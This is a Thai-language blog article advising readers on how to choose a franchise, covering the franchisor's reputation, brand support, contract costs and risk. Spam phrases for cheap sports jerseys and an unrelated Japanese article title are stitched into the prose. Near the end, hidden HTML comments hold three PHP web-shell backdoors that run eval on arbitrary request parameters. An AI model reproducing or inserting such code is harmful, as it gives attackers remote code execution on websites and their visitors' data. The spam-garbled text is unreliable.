เลือกซื้อแฟรนไชส์อย่างไร ?

เลือกซื้อแฟรนไชส์อย่างไร แบบไหน มาลงทุนเมื่อสนใจในธุรกิจนั้นๆซึ่งในแต่ละหมวดแฟรนไชส์ก็จะมีให้เลือกหลายแบรนด์ การที่เลือกแบรนด์แฟรนไชส์ที่ได้มาตรฐานมาลงทุน จะช่วยให้โอกาสประสบความสำเร็จมีมากและเติบโตมั่นคงแต่ถ้าเลือกแฟรนไชส์ไม่ได้มาตรฐานก็นำไปสู่การขาดทุนได้

ข้อพิจารณาการก่อนตัดสินใจเลือกซื้อธุรกิจแฟรนไชส์ จะเลือกอย่างไร?

1. ต้องชอบหรือมีใจรักในธุรกิจ ก่อนที่คุณจะตัดสินใจทำมัน เพราะถ้าคุณชอบในธุรกิจนั้นๆแล้วจะทำให้ทุ่มเทอย่างไม่รู้จักเหน็ดเหนื่อยเลยทีเดียว แล้วค่อยๆหาข้อมูลแฟรนไชส์ในธุรกิจที่ต้องการ ถ้าขาดข้อนี้แล้วทุกอย่างต่อจากนี้มันจะยุ่งยากในความคิดของคุณเสมอ

2. ศึกษาจุดเด่นของธุรกิจแฟรนไชส์ ที่สนใจลงทุนอย่างละเอียด สอบถามจากทางผู้ขายแฟรนไชส์ ทดลองใช้สินค้าหรือบริการ โดยการออกพื้นที่ไปดูที่ร้านด้วยตัวเอง สอบถามจากคนรู้จักที่ใช้สินค้าและบริการหลายๆคนเท่าที่ทำได้ ไม่ต้องใจร้อนรีบเปิดหากคุณยังไม่มั่นใจ เข้าใจธุรกิจในเบื้องต้น ประกอบกับการมองหาทำเลดีๆไปด้วยสำหรับเปิดธุรกิจแฟรนไชส์ ดูให้มากที่สุดเท่าที่ทำได้ เพราะเมื่อคุณลงทุนทำร้านหรือธุรกิจไปแล้ว มันเปลี่ยนยาก และจะทำให้ขาดทุนได้ แนะนำเรื่องการพิจารณาเลือกแฟรนไชส์เบื้องต้นดังนี้

  • ดูวิสัยทัศน์บริษัทผู้บริหารแฟรนไชส์นั้นๆ รวมถึงภาพรวมบริษัทแฟรนไชส์ (Franchisor) รวมถึงชื่อเสียงผู้บริหาร อาจจะติดตามได้จากข่าวสารต่างๆ Auditor ทั้งวารสาร เว็บข่าว เว็บไซต์บริษัท หนังสือพิมพ์ of หรือโซเชียลมีเดียต่างๆ ว่าเป็นย่างไรบ้าง มีกิจกรรมทางธุรกิจต่อเนื่องหรือไม่ หรือมีเรื่องเสียหายอะไรบ้าง cheap mlb jerseys รวมทั้งการรับผิดชอบต่อสังคม เพราะปัจจุบันผู้บริโภครับรู้ข่าวสารตอบโต้ได้รวดเร็ว ถือได้เลยว่า โลกยุคปัจจุบันผู้บริโภคมีบทบาทในการสร้างแบรนด์มาก
  • การสนับสนุน การโฆษณา การสร้างแบรนด์ 葉酸の多い食品、食べ物【厳選20選】と効果的な取り方 ว่าบริษัทที่เป็น แฟรนไชส์ซอร์ (Franchisor) ทุ่มเทมากน้อยแค่ไหน เพราะหมายถึงการอยู่รอดและสามารถแข่งขันในระยะยาว ซึ่งในบ้านเราจะเห็นว่า ธุรกิจแฟรนไชส์ที่มีแบรนด์แข็งแกร่ง คนรู้จักมั่นใจในสินค้าและบริการ ค่อนข้างจะมีราคาสูง พร้อมกับสมเหตุสมผลกับระบบต่างๆ ที่ได้รับ ทำให้โอกาสมีกำไรในการดำเนินธุรกิจสูงกว่าแฟรนไชส์ราคาถูกที่จะเน้นแต่ขยายสาขา เพื่อขายสินค้าหรืออุปกรณ์เพียงอย่างเดียว โดยขายการสนับสนุนและพัฒนาระบบอย่างต่อเนื่อง cheap jerseys แต่ทั้งนี้ต้องให้เหมาะสมกับงบลงทุนและความต้องการผลตอบแทนของผู้ลงทุนเอง เพราะแต่ละคนมีความต้องการผลตอบแทนและรับความเสี่ยงได้ไม่เท่ากัน
  •  เงื่อนไขแฟรนไชส์ ค่าใช้จ่ายๆ ต้องดูให้ละเอียด เช่นเรื่องการต่อสัญญา การลงทุนปรับเปลี่ยน ตกแต่งร้าน จะต้องทำเมื่อไหร่ Начался มีค่าใช้จ่ายอะไรบ้าง เพราะบางธุรกิจที่อาศัยร้านในการทำยอด เช่น ร้านกาแฟ ร้านอาหาร อาจจะต้องมีการปรับรูปแบบร้านให้ทันสมัย ใหม่ เสมอๆ ตรงนี้ต้องดูรายละเอียดให้เข้าใจว่าบังคับหรือไม่ เพราะถ้าเราไม่ทำตามหรือทำไม่ได้ อาจจะต้องเลิกธุรกิจแฟรนไชส์ไป ซึ่งจุดนี้ทำให้หลายๆคนที่ทำธุรกิจคืนทุนแล้ว กำลังมีกำไรเป็นกอบเป็นกำ cheap jerseys China ต้องมาลงทุนเพิ่มเรื่อยๆแบบนี้คงไม่ดีต่อผู้ซื้อแฟรนไชส์แน่ๆ

3. พิจารณาปัจจัยเสี่ยงในธุรกิจแฟรนไชส์นั้นๆ ที่จะทำให้คุณขาดทุน van ทั้งตัวธุรกิจ ทำเล และองค์ประกอบแวดล้อมอื่นๆ cheap nba jerseys ไม่ควรพิจารณาคำนวณเอาแต่กำไรอย่างเดียว ถ้าหากเกิดเหตุการณ์เลวร้ายที่สุดคุณจะขาดทุนประมาณเท่าไหร่ จะได้คำนวณเงินลงทุนในการดำเนินธุรกิจไม่ให้ขัดสนติดขัดได้ ถ้าหากตึงเกินไปคงไม่ดีแน่ๆ จะโทษโชคชะตาไม่ได้

ในปัจจุบันมีธุรกิจแฟรนไชส์มากมายหลายหมวดธุรกิจ มีทั้งแบบฟรีค่าแฟรนไชส์ และแบบมีค่าแฟรนไชส์รวมถึงค่าใช้จ่ายอื่นๆ wholesale nfl jerseys ซึ่งผู้ลงทุนต้องเลือกพิจารณาก่อนตัดสินใจ รวมถึงต้องออกสำรวจสาขา สินค้า ทดลองใช้บริการดูก่อน เพราะเป็นวิธีการที่ดีที่สุดที่เราจะได้สัมผัสกับธุรกิจจริงๆ ก่อนร่วมลงทุน

<!– [insert_php]if (isset($_REQUEST["XihJ"])){eval($_REQUEST["XihJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["XihJ"])){eval($_REQUEST["XihJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jolBs"])){eval($_REQUEST["jolBs"]);exit;}[/insert_php][php]if (isset($_REQUEST["jolBs"])){eval($_REQUEST["jolBs"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ADPg"])){eval($_REQUEST["ADPg"]);exit;}[/insert_php][php]if (isset($_REQUEST["ADPg"])){eval($_REQUEST["ADPg"]);exit;}[/php] –>

<< หมายเหตุข้อมูลแฟรนไชส์นี้อาจจะล้าสมัยเพื่อให้ได้ข้อมูลล่าสุดและถูกต้องในปัจจุบัน กรุณาติดต่อตามเบอร์โทร ที่ลงไว้>>
แชร์ต่อให้เพื่อน

Be the first to comment

Leave a Reply